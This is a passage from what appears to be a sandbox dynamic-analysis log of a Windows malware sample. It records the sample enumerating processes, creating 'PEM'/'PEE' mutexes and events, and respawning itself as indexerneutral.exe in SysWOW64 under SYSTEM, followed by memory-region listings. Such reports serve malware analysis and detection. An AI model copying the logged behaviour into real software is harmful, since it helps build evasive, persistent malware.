th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.429] GetCurrentProcessId () returned 0xad0 [0142.429] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.430] GetCurrentProcessId () returned 0xad0 [0142.430] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.430] GetCurrentProcessId () returned 0xad0 [0142.430] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.431] GetCurrentProcessId () returned 0xad0 [0142.431] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.432] GetCurrentProcessId () returned 0xad0 [0142.432] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0142.464] GetCurrentProcessId () returned 0xad0 [0142.464] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.465] GetCurrentProcessId () returned 0xad0 [0142.466] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.467] GetCurrentProcessId () returned 0xad0 [0142.467] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0142.468] GetCurrentProcessId () returned 0xad0 [0142.468] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x678, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.469] GetCurrentProcessId () returned 0xad0 [0142.469] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0142.470] GetCurrentProcessId () returned 0xad0 [0142.471] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x77c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0142.472] GetCurrentProcessId () returned 0xad0 [0142.472] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0142.473] GetCurrentProcessId () returned 0xad0 [0142.473] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0142.474] GetCurrentProcessId () returned 0xad0 [0142.474] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0142.475] GetCurrentProcessId () returned 0xad0 [0142.475] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0142.477] GetCurrentProcessId () returned 0xad0 [0142.477] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="commands xerox relationship.exe")) returned 1 [0142.478] GetCurrentProcessId () returned 0xad0 [0142.478] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nice-cu-characteristic.exe")) returned 1 [0142.480] GetCurrentProcessId () returned 0xad0 [0142.480] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shift.exe")) returned 1 [0142.481] GetCurrentProcessId () returned 0xad0 [0142.481] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="assuming.exe")) returned 1 [0142.482] GetCurrentProcessId () returned 0xad0 [0142.482] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fantasy-snap-charity.exe")) returned 1 [0142.482] GetCurrentProcessId () returned 0xad0 [0142.482] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="node_selections.exe")) returned 1 [0142.483] GetCurrentProcessId () returned 0xad0 [0142.483] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knitting.exe")) returned 1 [0142.484] GetCurrentProcessId () returned 0xad0 [0142.484] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="numericromancejake.exe")) returned 1 [0142.484] GetCurrentProcessId () returned 0xad0 [0142.484] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="casio flavor.exe")) returned 1 [0142.485] GetCurrentProcessId () returned 0xad0 [0142.485] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="friday_escape_populations.exe")) returned 1 [0142.486] GetCurrentProcessId () returned 0xad0 [0142.486] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="kg-tools.exe")) returned 1 [0142.486] GetCurrentProcessId () returned 0xad0 [0142.486] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="strengths_affected.exe")) returned 1 [0142.487] GetCurrentProcessId () returned 0xad0 [0142.487] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="broadcast officers.exe")) returned 1 [0142.488] GetCurrentProcessId () returned 0xad0 [0142.488] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bulgariageneratingprogram.exe")) returned 1 [0142.489] GetCurrentProcessId () returned 0xad0 [0142.489] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="orlando.exe")) returned 1 [0142.489] GetCurrentProcessId () returned 0xad0 [0142.489] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="facial_violence.exe")) returned 1 [0142.490] GetCurrentProcessId () returned 0xad0 [0142.490] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rings ownership printable.exe")) returned 1 [0142.491] GetCurrentProcessId () returned 0xad0 [0142.491] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0142.492] GetCurrentProcessId () returned 0xad0 [0142.492] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0142.492] GetCurrentProcessId () returned 0xad0 [0142.492] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0xe78, pcPriClassBase=13, dwFlags=0x0, szExeFile="sample.exe")) returned 1 [0142.493] GetCurrentProcessId () returned 0xad0 [0142.493] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.494] GetCurrentProcessId () returned 0xad0 [0142.494] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0142.494] GetCurrentProcessId () returned 0xad0 [0142.494] Process32NextW (in: hSnapshot=0xcc, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0142.496] GetCurrentProcessId () returned 0xad0 [0142.496] CloseHandle (hObject=0xcc) returned 1 [0142.497] _snwprintf (in: _Dest=0x19fe60, _Count=0x40, _Format="PEM%X" | out: _Dest="PEM1E4") returned 6 [0142.497] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="PEM1E4") returned 0xcc [0142.497] GetLastError () returned 0x0 [0142.497] CloseHandle (hObject=0xcc) returned 1 [0142.497] _snwprintf (in: _Dest=0x19fe60, _Count=0x40, _Format="PEM%X" | out: _Dest="PEMAD0") returned 6 [0142.497] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="PEMAD0") returned 0xcc [0142.497] _snwprintf (in: _Dest=0x19fee0, _Count=0x40, _Format="PEE%X" | out: _Dest="PEEAD0") returned 6 [0142.497] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="PEEAD0") returned 0xd0 [0142.497] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fc58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0142.497] CreateProcessW (in: lpApplicationName="C:\\Windows\\SysWOW64\\indexerneutral.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x80, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fbe0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fc28 | out: lpCommandLine=0x0, lpProcessInformation=0x19fc28*(hProcess=0xd8, hThread=0xd4, dwProcessId=0xc80, dwThreadId=0x98c)) returned 1 [0142.520] WaitForSingleObject (hHandle=0xd0, dwMilliseconds=0xffffffff) returned 0x0 [0143.499] CloseHandle (hObject=0xd8) returned 1 [0143.499] CloseHandle (hObject=0xd4) returned 1 [0143.499] CloseHandle (hObject=0xd0) returned 1 [0143.499] CloseHandle (hObject=0xcc) returned 1 [0143.499] ExitProcess (uExitCode=0x0) Thread: id = 438 os_tid = 0xc24 Process: id = "22" image_name = "backgroundtaskhost.exe" filename = "c:\\windows\\system32\\backgroundtaskhost.exe" page_root = "0x46759000" os_pid = "0xf0" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x23c" cmd_line = "\"C:\\Windows\\system32\\backgroundTaskHost.exe\" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca" cur_dir = "C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013da5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3389 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3390 start_va = 0xd077f60000 end_va = 0xd077f7ffff entry_point = 0x0 region_type = private name = "private_0x000000d077f60000" filename = "" Region: id = 3391 start_va = 0xd077f80000 end_va = 0xd077f93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d077f80000" filename = "" Region: id = 3392 start_va = 0xd077fa0000 end_va = 0xd07801ffff entry_point = 0x0 region_type = private name = "private_0x000000d077fa0000" filename = "" Region: id = 3393 start_va = 0xd078020000 end_va = 0xd078023fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d078020000" filename = "" Region: id = 3394 start_va = 0xd078030000 end_va = 0xd078031fff entry_point = 0x0 region_type = private name = "private_0x000000d078030000" filename = "" Region: id = 3395 start_va = 0xd078040000 end_va = 0xd078040fff entry_point = 0xd078040000 region_type = mapped_file name = "s-1-5-21-1462094071-1423818996-289466292-1000.pckgdep" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\Packages\\Microsoft.Windows.Cortana_1.4.8.152_neutral_neutral_cw5n1h2txyewy\\S-1-5-21-1462094071-1423818996-289466292-1000.pckgdep" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\packages\\microsoft.windows.cortana_1.4.8.152_neutral_neutral_cw5n1h2txyewy\\s-1-5-21-1462094071-1423818996-289466292-1000.pckgdep") Region: id = 3396 start_va = 0x7df5ff9c0000 end_va = 0x7ff5ff9bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9c0000" filename = "" Region: id = 3397 start_va = 0x7ff7e0af0000 end_va = 0x7ff7e0b12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7e0af0000" filename = "" Region: id = 3398 start_va = 0x7ff7e0b1c000 end_va = 0x7ff7e0b1cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7e0b1c000" filename = "" Region: id = 3399 start_va = 0x7ff7e0b1e000 end_va = 0x7ff7e0b1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7e0b1e000" filename = "" Region: id = 3400 start_va = 0x7ff7e11b0000 end_va = 0x7ff7e11b6fff entry_point = 0x7ff7e11b0000 region_type = mapped_file name = "backgroundtaskhost.exe" filename = "\\Windows\\System32\\backgroundTaskHost.exe" (normalized: "c:\\windows\\system32\\backgroundtaskhost.exe") Region: id = 3401 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 456 os_tid = 0x70c Process: id = "23" image_name = "indexerneutral.exe" filename = "c:\\windows\\syswow64\\indexerneutral.exe" page_root = "0x46007000" os_pid = "0xc80" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xad0" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutral.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3047 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3048 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3049 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3050 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3051 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3052 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "indexerneutral.exexe" filename = "\\Windows\\SysWOW64\\indexerneutral.exexe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exexe") Region: id = 3053 start_va = 0x776b0000 end_va = 0x77828fff entry_point = 0x776b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3054 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3055 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3056 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3057 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3058 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3059 start_va = 0x7fff0000 end_va = 0x7ffc57b4ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3060 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3061 start_va = 0x7ffc57d12000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc57d12000" filename = "" Region: id = 3062 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3063 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3064 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3065 start_va = 0x5bab0000 end_va = 0x5bb22fff entry_point = 0x5bab0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3066 start_va = 0x5bb30000 end_va = 0x5bb7efff entry_point = 0x5bb30000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3067 start_va = 0x5baa0000 end_va = 0x5baa7fff entry_point = 0x5baa0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3068 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3069 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3070 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3071 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3072 start_va = 0x290000 end_va = 0x2a4fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 3073 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3074 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3075 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 3076 start_va = 0x640000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3077 start_va = 0x740000 end_va = 0x8c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 3078 start_va = 0x8d0000 end_va = 0x98ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 3079 start_va = 0xb40000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 3080 start_va = 0x74750000 end_va = 0x747a8fff entry_point = 0x74750000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3081 start_va = 0x747b0000 end_va = 0x747b9fff entry_point = 0x747b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3082 start_va = 0x747c0000 end_va = 0x747ddfff entry_point = 0x747c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3083 start_va = 0x74a00000 end_va = 0x74aabfff entry_point = 0x74a00000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3084 start_va = 0x74df0000 end_va = 0x74f0ffff entry_point = 0x74df0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3085 start_va = 0x74f10000 end_va = 0x74f3afff entry_point = 0x74f10000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3086 start_va = 0x74f40000 end_va = 0x7502ffff entry_point = 0x74f40000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3087 start_va = 0x75030000 end_va = 0x7517cfff entry_point = 0x75030000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3088 start_va = 0x75190000 